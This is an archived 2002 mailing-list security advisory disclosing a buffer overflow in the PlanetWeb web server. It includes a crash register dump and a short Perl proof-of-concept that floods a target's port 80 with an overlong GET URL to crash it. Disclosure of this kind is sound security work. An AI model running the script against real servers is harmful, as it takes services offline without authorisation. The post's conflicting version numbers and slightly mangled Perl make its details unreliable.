OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: UkR security team™ (cuctema_at_ok.ru)
Date: Sat Sep 14 2002 - 16:38:35 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    :UkR security team presents:

    Release Date: September 14, 2002
    Product : PlanetWeb Software v1.14 and earlier
    versions
    Vendor : PlanetDNS (http://www.planetdns.net)
    Type : Buffer Overflow
    Author : UkR-XblP (cuctemaok.ru)
    Platforms : Microsoft Windows Variants

    About PlanetWeb:
    PlanetWeb is a complete commercial software package that
    provides you with
    everything you need to run your own website directly from
    your computer.
    It includes our lightening fast web server with integrated
    PHP support,
    so you can create sophisticated web pages without doing
    any configuration!

    Overview:
    A buffer overflow exists in versions 3.1 and previous of
    PlanetWeb Software.
    Exploitation of this vulnerability allows remote execution
    of arbitrary code
    with daemon privileges.

    Detailed Description:
    Sending a GET request containing a URL of approximately
    1024 characters or more
    causes Planet Web Server to crash. Exploitation is
    possible and proof of concept
    code has been authored to demonstrate this problem.

    Result:
    PDNSC caused an invalid page fault in
    module KERNEL32.DLL at 0167:bff9db61.
    Registers:
    EAX=c00309c4 CS=0167 EIP=bff9db61 EFLGS=00010216
    EBX=ffffffff SS=016f ESP=0214fde8 EBP=02150084
    ECX=00000000 DS=016f ESI=81770a14 FS=4217
    EDX=bff76855 ES=016f EDI=02150120 GS=0000
    Bytes at CS:EIP:
    53 8b 15 e4 9c fc bf 56 89 4d e4 57 89 4d dc 89
    Stack dump:

    Solution:
    Disable the Planet Web Server until a patch is made
    available by the vendor.

    ----------------- exploit - cut here -----------------

    #!/usr/bin/perl
    # PlanetWeb Software perl exploit
    # by UkR-XblP / UkR security team
    use IO::Socket;
    unless (ARGV == 1) { die "usage: $0 vulnurable_server
    ..." }
    $host = shift(ARGV);
    $remote = IO::Socket::INET->new( Proto => "tcp",
                                      PeerAddr => $host,
                                      PeerPort => "http(80)",
                                      );
    unless ($remote) { die "cannot connect to http daemon on
    $host" }
    $xblp = "A" x 1024;
    $exploit = "GET /".$xblp." HTTP/1.0\n\n";
    $remote->autoflush(1);
    print $remote $exploit;
    close $remote;

    ----------------- exploit - cut here ----------------- 

    ---
Professional hosting for everyone - http://www.host.ru